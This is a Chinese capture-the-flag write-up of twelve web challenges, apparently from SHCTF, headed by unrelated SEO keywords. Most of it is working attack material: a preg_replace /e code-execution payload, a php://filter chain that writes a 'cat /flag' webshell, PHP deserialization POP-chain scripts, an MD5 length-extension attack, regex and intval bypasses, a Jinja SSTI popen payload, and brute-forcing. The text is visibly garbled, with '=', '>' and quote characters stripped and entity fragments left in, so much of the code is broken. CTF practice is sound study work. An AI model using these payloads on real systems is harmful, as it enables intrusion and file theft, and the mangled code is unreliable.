百度 网站移动适配,.php是什么网站,网站域名使用方法,长沙本地论坛有哪些1.ezphp 看一眼#xff0c;你大爷#xff0c;啥玩意都给我过滤完了。
还好下面有preg_replace()/e#xff0c;会把replacement当作php语句执行
传参pattern.*#xff0c; .*表示任意字符#xff0c;code{${phpinfo()}} #xff0c;为什么这样写#xff0c;因为,print_…1.ezphp 看一眼你大爷啥玩意都给我过滤完了。
还好下面有preg_replace()/e会把replacement当作php语句执行
传参pattern.* .*表示任意字符code{${phpinfo()}} 为什么这样写因为,print_r(\\1)如果直接传phpinfo()会被当作字符串对待而php中{}里面的变量会被解析这样就能执行phpinfo()本来一直尝试文件读取结果flag就在phpinfo里面。
2.sseerriiaalliizzee 用伪协议
php://filter/string.strip_tags|convert.base64-decode/resource6.php
?php eval(system(cat /flag));?进行 base64编码然后拼接到后面
payload
?phpclass Start{public $barking;public function __toString(){return $this-barking-dosomething();}}class CTF{public $part1php://filter/string.strip_tags|convert.base64-decode/resource6.php;public $part2IDw/cGhwIEBldmFsKHN5c3RlbSgnY2F0IC9mbGFnJykpOz8;public function dosomething(){$useless ?php die(Genshin Impact Start!);?;$useful $useless. $this-part2;file_put_contents($this- part1,$useful);}}class Flag{public function dosomething(){include(./flag.php);return barking for fun!;}}$anew Start;$a-barkingnew CTF;echo serialize($a); 3.md5的事就拜托了 这题考的是md5长度拓展攻击。
parse_url()函数是 PHP 内置函数之一用于解析 URL 字符串将其拆分为不同的组成部分可以获取协议、主机名、端口号、路径、查询参数等信息。
构造SHCTF让回显flag的md5值
SHCTFhost://SHCTF:passuser/path?argsvalue#anch md5值为 c3ef7d5c6edf7d0495b0d8b92fe3241a
然后构造length输出flag 长度用小数绕过intval 长度为42下面是关键部分 把$num urldecode之后拼接在flag后面md5加密然后要与POST的SHCTF相等
这里考察md5长度拓展攻击用工具 获得flag flag{f92d1d13-0947-4212-bf78-269c400606a0} 4.babyrce 简单的绕过正则匹配,\拼接$IFS绕过空格
payload:rceca\t$IFS/f\lag 5.ezphp num不能有数字但是得通过intval()这里用数组绕过?num[]1
下面一个绕过需要code里面有SHCTF但是SHCTF前面又不能有东西这里用回溯绕过
脚本
import requests
data{c_ode:2023*260000SHCTF}
urlhttp://112.6.51.212:30302/?num[]1
resrequests.post(urlurl,datadata,allow_redirectsFalse)
print(res.text)6.ez_serialize 简单的反序列化pop链
_wakeup-_tostring-__get-invoke
payload
$anew B;
$a-qnew C;
$a-q-znew D;
$a-q-z-pnew A;
$a-q-z-p-var_1php://filter/readconvert.base64-encode/resourceflag.php;
echo serialize($a);7.登录就给flag 用bp爆破一下就得到密码password直接登录 8.生成你的邀请函吧 用postman发送json请求 9.serialize 正常的pop链注意一下php序列化里面的指针用法把$gao的地址写到$a上
__wakeup-__get-__tostring
注意序列化字符串不能以O开头所以我们序列化的时候转化成数组再序列化就可以绕过了
payload
?php
class misca{public $gao;public $fei;public $a;
}
class musca{public $ding;public $dong;}
class milaoshu{public $v;}
$anew musca;
$a-dingnew misca;
$a-ding-aaa;
$a-ding-gao$a-ding-a;
$a-ding-feinew milaoshu;
$a-ding-fei-vphp://filter/readconvert.base64-encode/resourceflag.php;
echo serialize(array($a));10.no_wake_up 依然是反序列化目的绕过__wakeup。
属性个数与实际属性个数不同就会绕过__wakeup。
payload
?php
class flag{public $usernameadmin;public $codephp://filter/readconvert.base64-encode/resourceflag.php;public function __wakeup(){$this-username guest;}public function __destruct(){if($this-username admin){include($this-code);}}
}
$anew flag;
echo serialize($a);
序列化得到
O:4:flag:2:{s:8:username;s:5:admin;s:4:code;s:57:php://filter/readconvert.base64-encode/resourceflag.php;}
把2改为3得到flag11.ez_ssti ssti注入hello后面应该跟的是名字盲猜参数名是name 很成功开始构造语句
payload
?name{{%27%27.__class__.__base__.__subclasses__()[132].__init__.__globals__[%27popen%27](%27cat /flag%27).read()}}
没有任何过滤 12.EasyCMS
后台扫描得到登录地址/admin/admin.php 默认用户名admin 密码tao 这里存在任意文件读取漏洞可以读取到根目录的flag文件
